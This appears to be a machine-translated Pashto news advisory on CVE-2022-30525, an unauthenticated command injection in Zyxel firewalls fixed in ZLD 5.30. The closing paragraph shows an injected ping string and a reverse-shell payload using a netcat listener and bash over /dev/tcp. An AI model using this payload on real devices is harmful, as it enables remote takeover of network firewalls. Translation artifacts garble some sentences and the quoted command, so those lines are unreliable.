په زیکسیل فایر والونو کې زیانمنتیا چې د کوډ اجرا کولو ته اجازه ورکوي پرته له تصدیق

یو مهم زیانمنونکي (CVE-2022-30525) د ATP، VPN او USG FLEX لړۍ Zyxel وسیلو کې پیژندل شوي، چې په شرکتونو کې د اور وژنې، IDS او VPN عملیات تنظیم کولو لپاره ډیزاین شوي، کوم چې بهرني برید کونکي ته اجازه ورکوي چې کوډ اجرا کړي. وسیله پرته له تصدیق پرته د کارونکي حقونو پرته. د برید ترسره کولو لپاره، برید کوونکی باید وکوالی شي د HTTP/HTTPS پروتوکول په کارولو سره وسیلې ته غوښتنې واستوي. Zyxel د ZLD 5.30 فرم ویئر تازه کولو کې زیان منونکي حل کړي. د شوډان خدمت په وینا، اوس مهال په نړیواله شبکه کې 16213 احتمالي زیان منونکي وسایل شتون لري چې د HTTP/HTTPS له لارې غوښتنې مني.

عملیات د ویب هینډلر /ztp/cgi-bin/handler ته د ځانګړي ډیزاین شوي کمانډونو لیږلو سره ترسره کیږي ، پرته له تصدیق څخه د لاسرسي وړ. ستونزه د غوښتنې د پیرامیټونو د سم پاکولو نشتوالي له امله رامینځته کیږي کله چې په سیسټم کې د os.system کال په کارولو سره کمانډ اجرا کول چې په lib_wan_settings.py کتابتون کې کارول کیږي او د setWanPortSt عملیاتو پروسس کولو پرمهال اجرا کیږي.

د مثال په توګه، یو برید کوونکی کولی شي تار تیر کړي "؛ پینګ 192.168.1.210؛ کوم چې به په سیسټم کې د "ping 192.168.1.210" کمانډ اجرا کولو لامل شي. د کمانډ شیل ته د لاسرسي لپاره، تاسو کولی شئ په خپل سیسټم کې "nc -lvnp 1270" چل کړئ، او بیا د وسیلې سره د غوښتنې په لیږلو سره د ریورس پیوستون پیل کړئ؛ bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

سرچینه: opennet.ru

Add a comment